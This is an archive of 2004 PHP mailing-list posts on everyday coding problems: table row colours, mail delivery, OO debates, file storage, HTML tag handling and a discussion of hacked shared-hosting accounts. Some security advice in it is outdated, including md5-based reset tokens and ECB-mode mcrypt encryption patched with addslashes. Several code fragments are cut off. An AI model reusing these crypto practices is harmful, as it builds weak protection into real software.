RE: [PHP] user password managment

[Justin Palmer]

> if($thisRow % 2 == "0"){


Should be: if(($thisRow % 2) == 0){

Regards,

Justin

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] fsockopen https problem

[Maycon de Oliveira]

Hi, i have problem in my script, this error is Permission Danied (13)

 

 

 

 "full",

 "originator" => "33",

 "urn" => "2528",

 "surname" => "appleton",

 "submit" => "submit"

);

//build the post string

  foreach($formdata AS $key => $val){

   $poststring .= urlencode($key) . "=" . urlencode($val) . "&";

  }

// strip off trailing ampersand

$poststring = substr($poststring, 0, -1);

 

$fp = fsockopen("https://".$host, $port, $errno, $errstr, $timeout = 10);

 

if(!$fp){

 //error tell us

 

 echo "$errstr ($errno)\n";

 

}else{

 

  //send the server request

  fputs($fp, "POST $path HTTP/1.1\r\n");

  fputs($fp, "Host: $host\r\n");

  fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");

  fputs($fp, "Content-length: ".strlen($poststring)."\r\n");

  fputs($fp, "Connection: close\r\n\r\n");

  fputs($fp, $poststring . "\r\n\r\n");

 

  //loop through the response from the server

  while(!feof($fp)) {

   echo fgets($fp, 4096);

  }

  //close fp - we are done with it

  fclose($fp);

}

?>

Re: [PHP] user password managment

[Brad Ciszewski]

i have changed the script around a bit, now it actually shows something, but
it doesnt alternate.

$thisRow = "0";

$query = mysql_query("SELECT * FROM security_images ORDER BY ID DESC",
$conn);
while($gt=mysql_fetch_array($query)){
extract($gt);
if($thisRow % 2 == "0"){
$backgroundColor = "#CC";
}else{
$backgroundColor = "#FF";
}
?>
  






  
   wrote in message
news:[EMAIL PROTECTED]
> > Does anybody have any tips or links for creating a system for managing
> > user's passwords. I want to make it so that when a user is created, an
> > email is sent with a link that allows them to set their password. The
> > link should only work for a set amount of time. I have ideas for
> > implementing something, but I have a hunch tat there is some code
> > already out there for this. Does anybody know of any? Thanks!
>
> Use the sample code in http://php.net/md5 to create a hash, and store that
> in your database with a datetime value of now().  The hash will be quite
> unpredictable by the Bad Guys.
>
> Send that hash as part of the link in your email, and compare that hash to
> yours in the database.
>
> To make it even harder to bust, store the http://php.net/crypt *of* the
> md5 hash value, so that the actual value in the database is not what they
> need to send, but you can crypt what they send to see if it is the correct
> value.  That way, if somebody gains access to read your database, the
> values stored there do them no good.
>
> Course, it's more likely that somebody will gain access to the recipient's
> email, but there is little you can do about that in today's environment.
> Digitally-signed and secure email is nowhere near pervasive enough.
>
> An alternative is to send them a randomly-generated password, storing only
> the crypt() of it, of course, and then force them to change the password
> on first login.
>
> Since some email clients have a tough time getting long URLs, this can be
> less intensive on your Support/Help resources (your time) and it's really
> not a lot less secure than the long URL method.
>
> --
> Like Music?
> http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[Greg Donald]

On Fri, 10 Dec 2004 22:00:43 +, KJ <[EMAIL PROTECTED]> wrote:
> Let me try to paint another simple senario:
> 
> 1. You have a shared hosting account with example.com hosted on it.
> 2. You want a guestbook setup on it, and you've found one that you like.
> 3. You install "phpMyFantasticGuestbook" onto your account.
> 4. It's a well used application and thus you don't go through the source
> to check for vunerabilities.

It's usually the popular scripts that get cracked most often, Google
for PHPNuke, or vBulletin exploits for example.  Subscribe yourself to
some security lists and read for a couple weeks.  They just sit around
all day and discuss cracking web apps back and forth until someone
finds a vulnerability.

> 5. Joe Hacker has studied the script coz he's a tart that wants to piss
> people off and he has found a vunerability.
> 6. Joe Hacker uses the vunerability to change your account passwd. He
> then logs in as you and deletes all your files. He has access to your
> mysql password which was in the congif file of phpMyFantasticGuestbook

Why would you allow your MySQL user to connect from anywhere besides
your web server?  Remote MySQL connections are a big no-no.

> and he deletes all your data, he then leaves a nice index.php in your
> account to say that he's been by.

Hope you had backups.  You did have backups, right?

> This is what I'm talking about, I hope this is clear. The vunerability I
> described in one of my previous posts.
> 
> The "worry" that I'm expending comes from being hacked twice using this
> method, I think the amount of worry expended is in line with the amount
> of frustration that I have endured.

Sorry to hear that, I'd recommend you stop using
phpMyFantasticGuestbook immediately.  And anything else you don't feel
paranoid about to audit.

I'm no web app cracker but I'm paranoid as they get when it comes to
security.  Find yourself some security conscious friends.  Hang out. 
Learn.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

FW: [PHP] Multiple Inheritance

[Justin Palmer]

Sorry, Greg for sending this to you personally.

I also forgot to leave a link of a PHP Unit Testing Suite.

www.lastcraft.com/simple_test.php - Simple Test

Regards,

Justin
 


-Original Message-
From: Justin Palmer [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 7:51 PM
To: 'Greg Donald'
Subject: RE: [PHP] Multiple Inheritance


Hi,

What do you do for Unit Testing in procedural world?

I think that this is a nice addition to the OO world.  I have not heard
of a tool for procedural, is there any?

Kind regards,

Justin Palmer



-Original Message-
From: Greg Donald [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 7:42 PM
To: PHP general
Subject: Re: [PHP] Multiple Inheritance


On Fri, 10 Dec 2004 18:27:12 -0600, Ryan King <[EMAIL PROTECTED]> wrote:
> Yeah, but in the case of the Linux kernel there's no programming
> language that is both OO and close enough to the metal to program a 
> kernel (other than maybe Forth??).

C++, being a superset of C, would certainly be 'close enough to the
metal' and is indeed OO, yet the Linux kernel developers have chosen not
to use it.

> That means that we can't make a judgment as to the
> relative merits of procedural and object-based programming in kernel
> development.

Sure we can, but we don't have to since they already made it.  No OO in
the kernel was the verdict many times over:

http://marc.theaimsgroup.com/?l=linux-kernel


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] PHP via DIAL-UP?

[Sadeq Naqashzade]

Hi,
It is simple. Only you need setup an incoming connection in network connection.
Note that this is not PHP/APACHE matter it is Windows matter. You can
find detailed guide in Windows Forums.
- Sadeq


On Fri, 10 Dec 2004 17:34:56 -0800 (PST), Police Trainee
<[EMAIL PROTECTED]> wrote:
> Hello. I have a computer at my office running Apache
> that I use to run PHP scripts with using
> http://localhost.
> 
> Is there anyway I can set up my computer to allow me
> to dial-in from home and use the webserver and my php
> applications?
> 
> It is a win 98 system with tcp/ip.
> 
> __
> Do you Yahoo!?
> Read only the mail you want - Yahoo! Mail SpamGuard.
> http://promotions.yahoo.com/new_mail
> 
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
> 


-- 
Sadeq Naqashzade Yazdi
Sadeq [at] Yazd [dot] info


Phone: +98 351 626 7581
Fax: +98 351 626 4827


-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

I l wrote:
> Lets say you want to store someones picture.

Okay.

> In the database, you would insert the picture, who owns that picture,
> maybe
> the ip address and request headers of where that picture came from, the
> category, sub-category, sub-sub-category in which the picture belongs to,
> etc. You can gather and store as much information about that picture as
> you
> want with ease.

Except I can't just insert the picture.

I need to store it as a BLOB, which requires a lot more code.

> When you want to access that file and its attributes, you only have to do
> one database query.

Plus another chunk of code for the BLOB.

> Wouldn't you agree that this structure is much easier to manage than
> storing
> the file in a directory, then storing that extra information in a
> database?

No, I would not agree at all.

> Then to retrieve, you must do a database query and find the file in the
> FILESYSTEM (hoping it is still there). The code is much more complex

Actually, it's a whole lot simpler.

If I use some kind of key (such as the auto_increment field) in my
filename, I might not even need to query the database to find the image I
want -- I already know the filename just from the key.

Depends on the application, of course, and the privacy/security of the
image and its related data.

>> > And finally, file management is much much easier when you store the
>>files in
>> > a database.

What have you been smoking?
unlink is that much harder than a destroying a BLOB?

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Php Mail not working properly

[Manuel Lemos]

Hello,
Phpdiscuss - Php Newsgroups And Mailing Lists wrote:
I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
Either the message bounced or it is in the queue awaiting for delivery.
If you are using sendmail or exim try mailq from the root account to see 
if the message is in thq queue.

If the message is not in the queue, it bounced to the return path 
address. You can set the return path address using the mail function 5th 
argument. You may also want to take a look at this class that lets you 
specify the return path address just setting the return-path: header. 
The examples show how to do that.

http://www.phpclasses.org/mimemessage
--
Regards,
Manuel Lemos
PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/
Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Php Mail not working properly

[Matthew Sims]

> I have a dedicated Red Hat linux boxed leased from Interland and the php
> mail function does not work.  I have found several articles on things to
> try and have tried everything I saw but to no avail.  I set up a php
> script to mail and then print the return code and I get a 1 (success).
> But the mail never arrives.  Is there any way I could get some help with
> this.  I could post my phpinfo() information or anything else that may
> help.
>

Can you send mail from the server? Meaning:

$ echo "Testing email" | sendmail [EMAIL PROTECTED]

Did you receive the mail? Can you send mail to the server itself by
replying back to the email?

If your answer is no to at least the first part, then you need to setup a
mail server.


-- 
--Matthew Sims
--

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Greg Donald]

On Fri, 10 Dec 2004 18:27:12 -0600, Ryan King <[EMAIL PROTECTED]> wrote:
> Yeah, but in the case of the Linux kernel there's no programming
> language that is both OO and close enough to the metal to program a
> kernel (other than maybe Forth??).

C++, being a superset of C, would certainly be 'close enough to the
metal' and is indeed OO, yet the Linux kernel developers have chosen
not to use it.

> That means that we can't make a judgment as to the
> relative merits of procedural and object-based programming in kernel
> development.

Sure we can, but we don't have to since they already made it.  No OO
in the kernel was the verdict many times over:

http://marc.theaimsgroup.com/?l=linux-kernel


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: How to post form-data to a host using PHP

[Manuel Lemos]

Hello,
Minghua Yao wrote:
Does anybody know how to post form-data to a host using PHP? Thanks for the answer.
You may want to try this HTTP client class that can post forms including 
uploading files if necessary:

http://www.phpclasses.org/httpclient
--
Regards,
Manuel Lemos
PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/
PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/
Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Paul Reinheimer]

I beleive the performance hit is much higher than the %2 increase you
are refering to:

$ cat /.../loadtest.php


$ ./ab -n 1000 -c 50 http://.../loadtest.php
Time taken for tests:   1.653 seconds
Complete requests:  1000
...
Requests per second:604.96 [#/sec] (mean)
Time per request:   82.65 [ms] (mean)
Time per request:   1.65 [ms] (mean, across all concurrent requests)
Transfer rate:  15177.50 [Kbytes/sec] received


$ ./ab -n 1000 -c 50 http://.../placeholderimage.png
Time taken for tests:   0.809 seconds
Complete requests:  1000
...
Requests per second:1236.09 [#/sec] (mean)
Time per request:   40.45 [ms] (mean)
Time per request:   0.81 [ms] (mean, across all concurrent requests)
Transfer rate:  30854.14 [Kbytes/sec] received


Apache 1.3.31, PHP 5.0.2

As you can see, once you move past the single request point, and
actually occupy the server for a few moments the hit is far more than
2%.



paul


-- 
Paul Reinheimer

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Not quite PHP, but related...

[Tom Rogers]

Hi,

Saturday, December 11, 2004, 8:16:44 AM, you wrote:
BBBM> Hi you all,

BBBM> is that possible using .htaccess to redirect every request to a 
BBBM> specified script?

BBBM> for example if you have:

BBBM> http://www.yoursite.com/en/articles/blab.html

BBBM> where there isn't a en dir., so it would be redirected to

BBBM> public_html/site

BBBM> I could use error page, but it won't receive post, get, cookie and 
BBBM> session headers.

BBBM> Regards,
BBBM> Bruno B B Magalhaes


You can force apache to treat en as a php file with


ForceType application/x-httpd-php


in the .htacess of the root directory (although I put it in the main httpd.conf
as I have access to it)

Then as an example, in the file en (note no .php)

";
?>
replace $file with whatever file is needed.
-- 
regards,
Tom

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] php mail

[PHPDiscuss - PHP Newsgroups and mailing lists]

I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
help.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] php mail

[PHPDiscuss - PHP Newsgroups and mailing lists]

I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
help.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] PHP via DIAL-UP?

[Police Trainee]

Hello. I have a computer at my office running Apache
that I use to run PHP scripts with using
http://localhost. 

Is there anyway I can set up my computer to allow me
to dial-in from home and use the webserver and my php
applications?

It is a win 98 system with tcp/ip.



__ 
Do you Yahoo!? 
Read only the mail you want - Yahoo! Mail SpamGuard. 
http://promotions.yahoo.com/new_mail 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: alternating table entry colors

[Jason Motes]

Brad Ciszewski wrote:
i need some assistance making my table (rows) change color for every other
data. here is what i have so far, but i get a "unexpected T_STRING error".
this error's line is: if($thisRow mode 2 == 0){
I beleive you want
if($thisRow % 2 == 0)
not
if($thisRow mode 2 == 0)
http://us2.php.net/operators.arithmetic
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Php Mail not working properly

[PHPDiscuss - PHP Newsgroups and mailing lists]

I have a dedicated Red Hat linux boxed leased from Interland and the php
mail function does not work.  I have found several articles on things to
try and have tried everything I saw but to no avail.  I set up a php
script to mail and then print the return code and I get a 1 (success). 
But the mail never arrives.  Is there any way I could get some help with
this.  I could post my phpinfo() information or anything else that may
help.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Multiple Inheritance

[Michael Sims]

Please note that I am specifically *not* weighing in on the OO vs.
procedural religious war, but only wanted to make a couple of small
comments. :)

Richard Lynch wrote:
> I spend a *LOT* more time, digging through endless class files, of
> what are essentially name-spaces of singleton "objects" trying to
> find the line of code some idiot typed that is doing the wrong thing,
> but starting from 'index.php' I have *NO* *IDEA* how it got in there.

debug_backtrace() is your friend.  I have a tiny little backtrace function
that I use that accepts a label and dumps the label and the output of
debug_backtrace() to the terminal that I am SSH'ed into (via a redirect to
/dev/pts/[0-9]+).  If I have a complicated class hierarchy, or a series of
library files that include other files, etc. then I add a line into the
function that is giving me trouble:

backtrace('one');

If I have two functions I want to check I just add it again, but make sure
my label is different:

backtrace('two');

Then I request the page and check my terminal screen to see how the PHP
parser made it to the offending section(s) of code.  I even array_reverse()
the array returned from debug_backtrace() so it starts with index.php and
works it's way down (I find this easier to follow).

> I end up having to "grep" source code just to find the damn thing.

A good editor would help here.  For example my editor of choice, jEdit
(www.jedit.org), allows you to search for a string (or a regex) across every
open file, and using its "HyperSearch" functionality shows an index of
filename and line number containing your search string that you can easily
click on to jump around.  Of course it only searches files that are already
open, and if you're dealing with a large number of files sometimes grep is
still necessary to narrow down which ones need to be opened, but it's still
an immense help to me.  I'm sure many other editors offer similar
functionality.

Just a couple of tangential thoughts...

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] recompiling php

[Raditha Dissanayake]

John Nichel wrote:
blackwater dev wrote:
Thanks John,
I tried the rpm and it throws errors that it can't find the php
package required by:
php-mysql
php-imap
php-idap
php-mbstring.
Thanks!

RPM and other binary informations suck. Remove them and install from 
source code.

--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: Re: [PHP] Close all open tags in HTML text

[Greg Donald]

On Fri, 10 Dec 2004 17:38:13 -0500, John Holmes
<[EMAIL PROTECTED]> wrote:
> strip_tags() is a rather worthless function, if you ask me.

strip_tags() is pretty handy when scraping another site.  Like the
other day I was asked to grab some links off a site where there was no
RSS feed available.. I easily left the anchor tags in but removed
everything else.


-- 
Greg Donald
Zend Certified Engineer
http://gdconsultants.com/
http://destiney.com/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: PHP Security

[Richard Lynch]

[EMAIL PROTECTED] wrote:
> Quoting I l <[EMAIL PROTECTED]>:
>> So, you would prefer storing the uploaded file in your directory than a
>> database? Have you tried either method?
>
> And, by the way, once you upload it into a database, it's not a file.
> It's just
> a data field.

Actually, internally, it *is* a file, or part of a file, depending on the
database implementation details. (*)

So you're adding overhead into the storage and retrieve of your content
for some unspecified (so far) benefit.

* I'm sure somebody somewhere is storing their entire db in RAM or on
Flash or whatever, but let's stick to the common usage here.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Ryan King]

On Dec 10, 2004, at 3:50 PM, Greg Donald wrote:
On Fri, 10 Dec 2004 10:32:30 -0800 (PST), Richard Lynch 
<[EMAIL PROTECTED]> wrote:
What I do is not use classes.
I agree.
Some of the worst arguments for OO I've heard recently:
"OO programming lets you organize your code better."
So what you're saying is that you're not capable of organizing similar
functions into files and directories and using include() or require()
as needed?
Just because someone thinks using OOP is better doesn't mean they don't 
think procedural programming is insufficient.

"OO programming lets lots of developers work on the same code base
easier."
Malarkey[1].  The Linux Kernel crew gets along fine with no OO code.
Hundreds of thousands (millions?) of lines of code with thousands of
developers contributing daily.  A good revision control system is all 
you
need.
Yeah, but in the case of the Linux kernel there's no programming 
language that is both OO and close enough to the metal to program a 
kernel (other than maybe Forth??). In other words, OOP is not a good 
option for a kernel. That means that we can't make a judgment as to the 
relative merits of procedural and object-based programming in kernel 
development.

"Using OO programming is more efficient"
Where are your benchmarks?
Then you have scenarios where you have to come behind coders who think
they know OO, but they make poorly designed classes and end up calling
lots of functions statically like Object::foo().. which totally defeats
the purpose of objects along the way.
Now this certainly isn't an argument against OOP, but bad programming. 
I don't think anyone is going to argue for bad programming (unless they 
really like COBOL :-). Also, on the subject of static function calls, 
in my mind its the closest PHP will ever get to having namespaces and 
preventing function name collisions.


At all.
And then you run into real life.  I'm working at a place right now
where they love OO programming.  We use Mojavi, PEAR, and Smarty
everywhere.  I understand OO pretty well I think, and I'm studying
the latest Mojavi framework.  Hopefully I'll be ahead of the curve
on the next project later down the road.  I don't really enjoy OO
programming and I don't think I'd ever code one of my own projects
with it, but I will go grab a PEAR module if it fits my needs. Code
re-use may be the only redeeming quality of OO programming, and
honestly I can re-use your code from a non-OO include file just as
easily.
Code reuse is a major reason for OOP. Obviously you believe that it is 
no better than old-fashioned procedural programming. I'm not going to 
disagree with you. Either approach is definitely doable. It is also 
possible to fuck up either approach.

It just doesn't make sense to instantiate objects for a script whose
total execution lifetime is less than a second or two.  The overhead
just isn't worth it.
This is a good point. There are many times where it doesn't make sense. 
However, PHP5 is much better at this that PHP4 is.

I think there's a major point missing here. OOP is just another way of 
providing abstractions to the programmer. Everything above machine-code 
is an abstraction of some sort and language designers try to provide 
abstractions which allow programmers to work better. Objects are 
abstractions, functions are abstractions, even variables are 
abstractions.

Why do we need abstractions? Because it helps us comprehend systems 
more easily. If we can only hold some many thoughts in our mind at 
once, it is advantageous to have high-order (more abstract) ideas, 
rather than lower-level ideas.

Just my $.02,
-ryan
--
http://theryanking.com/blog
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] ISP snippet

[Brad Ciszewski]

i need the script which will do this all automaticly.. i know there is a
feature to get the server which the user is from.




"Danny Brow" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> On Thu, 2004-12-09 at 18:17 -0600, Brad Ciszewski wrote:
> > i need help to figure out the isp of a user. can anyone help me with
this?
>
> http://www.arin.net/whois/
>
> It will give you the owner of the IP address, i.e. Bell, AOL, etc.
>
> Whats the reason you need the uses ISP?
>
> >
> >
> >
> > -Brad
> >
> > www.BradTechnologies.com
> > 99.9% Uptime
> > 24/7 Support
> > Packages as low as 3.50 p/month!
> > www.BradTechnologies.com
> >

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: encrypt/decrypt sqlite data

[Shawn McKenzie]

Shawn McKenzie wrote:
This is my first adventure with mcrypt and also the sqlite stuff.
Via file upload I am getting a SQL dump file and running it as a query
to insert data into a sqlite db.  This works great.
Then I am trying to use an update query to encrypt fields in all rows by
using the sqlite_create_function to run my encryption function that uses 
$_SESSION['key'] which is an md5 hash of a pass phrase):

$db = sqlite_open("db");   
sqlite_create_function($db, 'enc', 'encrypt', 1);
   
$sql  = 'UPDATE mytable SET f1=enc(f1);'
.'UPDATE results SET f2=enc(f2);';

sqlite_query($db, $sql);
function encrypt($txt)
{
$key = $_SESSION['key'];
$txt = trim($txt);

$iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

$black = mcrypt_encrypt(MCRYPT_CAST_256, $key, $txt, 
MCRYPT_MODE_ECB, $iv);

return $black;
}

Then to test, I query the db and run each field of data thru a decrypt
function before displaying it:
$db = sqlite_open("db");
$sql = "SELECT * from mytable";
$row = sqlite_array_query($db, $sql);

echo "";
foreach ($row as $k => $v) {
echo ""
."".decrypt($v['f1'])." "
."".decrypt($v['f2'])." "
."";
}
echo "";

function decrypt($black)
{
$key = $_SESSION['key'];

$iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

$txt = mcrypt_decrypt(MCRYPT_CAST_256, $key, $black, 
MCRYPT_MODE_ECB, $iv);

return $txt;
}

The problem is that the data that is displayed is not the original data.
 Some fields seem to be truncated and some seem to be mostly decrypted
except for the last line or so.  For the fields f1 and f2 I have tried
text and blob.  The actually data is either one word of text or free 
flow text with line feeds.

TIA,
Shawn
Hmmm... Normally I would addslashes before stashing data in the db.  I 
should have done that here.  All is well now.  :-)

Thanks!
-Shawn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] alternating table entry colors

[Brad Ciszewski]

i need some assistance making my table (rows) change color for every other
data. here is what i have so far, but i get a "unexpected T_STRING error".
this error's line is: if($thisRow mode 2 == 0){

+=+=+  SCRIPT BELOW  +=+=+

$thisRow = 0;

$query = mysql_query("SELECT * FROM security_images ORDER BY ID DESC");
while($gt=mysql_fetch_array($query)){
if($thisRow mode 2 == 0){
$backgroundColor = "#CC";
}else{
$backgroundColor = "#FF";
}

extract($gt);
echo ?>
  






  
  

+=+=+  SCRIPT ABOVE  +=+=+

thanx in advance!

- Brad

www.BradTechnologies.com - Web Services

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Multiple Inheritance

[Ryan King]

On Dec 10, 2004, at 4:17 PM, Greg Beaver wrote:
The biggest hogs in php programming are:
1) unnecessary images and animated crap/unnecessary javascript
2) terrible database usage
3) too much complexity in the design
I would like to add
0) Compilation. Many scripts take longer to compile than execute. 
Adding a byte-code compiler will often increase performance by an order 
of magnitude.


It doesn't matter whether you are using OO or functions - if your 
application has too many lines of code per task, it won't be fast.
-ryan
--
http://theryanking.com/blog
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Matt Palermo]

I realize that I can use the strip_tags function to remove HTML.  But I 
don't want to remove HTML tags.  I just want to make sure all open HTML tags 
are closed.  For example if they user submits HTML with a  tag and 
never closes it, then the rest of the page will look screwed up.  I still 
want to allow them to use HTML, but I want to close tags that were left open 
by them.  This way it allows them to use HTML and it won't screw up the rest 
of the page.

Thanks,

Matt



"Richard Lynch" <[EMAIL PROTECTED]> wrote in message 
news:[EMAIL PROTECTED]
> Matt Palermo wrote:
>>  I would like to leave any HTML in there,
>
> Do you *TRUST* the people typing the HTML to not attack your server, or
> others, with cross-site scripting attacks?
>
> If not, go re-read the manual about strip_tags, and pay particular
> attention to the second, optional, argument.
>
>> but just make sure that ending
>> tags exist, so it doesn't screw up the rest of the page.  Strip tags 
>> would
>> just wipe out the HTML rather than allowing it and ending it safely.
>
> Strip tags will allow you to wipe out *DANGEROUS* HTML which will make
> your web server a source of problems not only to you, but to me as well.
>
> Please use strip_tags to allow only the tags you *NEED* the users to be
> able to use.
>
> It will only take you seconds, and it will save you (and us) a lot of
> grief in the long run.
>
> -- 
> Like Music?
> http://l-i-e.com/artists.htm 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] array_merge_recursive

[Sebastian]

thanks for the help. i do have a question.. say instead of 2 keys in the
array there are 3 or 4.. how would that be done?
i do not know much about arrays so i am trying to learn.

thanks.


- Original Message - 
From: "Craig Slusher" <[EMAIL PROTECTED]>
To: "Sebastian" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, December 10, 2004 2:45 PM
Subject: Re: [PHP] array_merge_recursive


> foreach ($animal_counts as $animal => $total) {
> echo $animal. ':' .$total. '';
> }
>
>
> On Fri, 10 Dec 2004 13:51:36 -0500, Sebastian
> <[EMAIL PROTECTED]> wrote:
> > actually, what i mean is i need to get the animal name as well..
> >
> > ie:
> > echo $animal . ' : ' .  $total
> > would output:
> >
> >  : 
> >  : 
> >
> > etc. thanks.
> >
> >
> >
> > - Original Message -
> > From: "Sebastian" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Friday, December 10, 2004 12:24 PM
> > Subject: [PHP] array_merge_recursive
> >
> > > Hi.
> > >
> > > I am using this array_merge_recursive to merge two arrays, the array
looks
> > > like this:
> > >
> > > Array
> > > (
> > > [0] => Array
> > > (
> > > [animal] => Dogs
> > > [total] => 5
> > >
> > > )
> > >
> > > [1] => Array
> > > (
> > > [animal] => Cats
> > > [total] => 3
> > > )
> > >
> > > [2] => Array
> > > (
> > > [animal] => Cats
> > > [total] => 6
> > > )
> > >
> > > )
> > >
> > > the output i need is:
> > > Dogs 5
> > > Cats 9
> > >
> > > I need to add the total but keep just one animal if its already there.
can
> > > someone please help? i been stuck for two days. i appreciate it.
> > >
> > > --
> > > PHP General Mailing List (http://www.php.net/)
> > > To unsubscribe, visit: http://www.php.net/unsub.php
> > >
> > >
> > >
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
>
>
> -- 
> Craig Slusher
> Web Programmer
> [EMAIL PROTECTED]
>
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Not quite PHP, but related...

[Jonel Rienton]

could header("Location: urlhere") be an alternative?
jonel
http://www.road14.com
http://www.filipinosrus.com
--
I not know English well, but I know 7 computer languages.
anonymous
On Dec 10, 2004, at 4:16 PM, Bruno B B Magalhães wrote:
Hi you all,
is that possible using .htaccess to redirect every request to a 
specified script?

for example if you have:
http://www.yoursite.com/en/articles/blab.html
where there isn't a en dir., so it would be redirected to
public_html/site
I could use error page, but it won't receive post, get, cookie and 
session headers.

Regards,
Bruno B B Magalhaes
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[KJ]

Richard Lynch wrote:
Now in each instance register globals was on and all that was needed to
You should turn register_globals off, first of all.
True, ideally register globals should be off.
Secondly, something is very very very wrong in your analysis.
No it isn't.
If this line of code gets executed:
$base_url = '/home/expample.com/www';
then the setting of register_globals can have *NO* effect on $base_url.
Yes...
It is being initialized, as it should, to a correct value, in that line of
code.  Any GET/POST data being sent in, is junked when that line is
executed.
I know...
Therefore, they must *ALSO* be surfing to a page which does not correctly
'include' the code which sets $base_url in the first place.
As I stated in my post...
So, not only do you have register_globals "on" which is a Bad Idea, you've
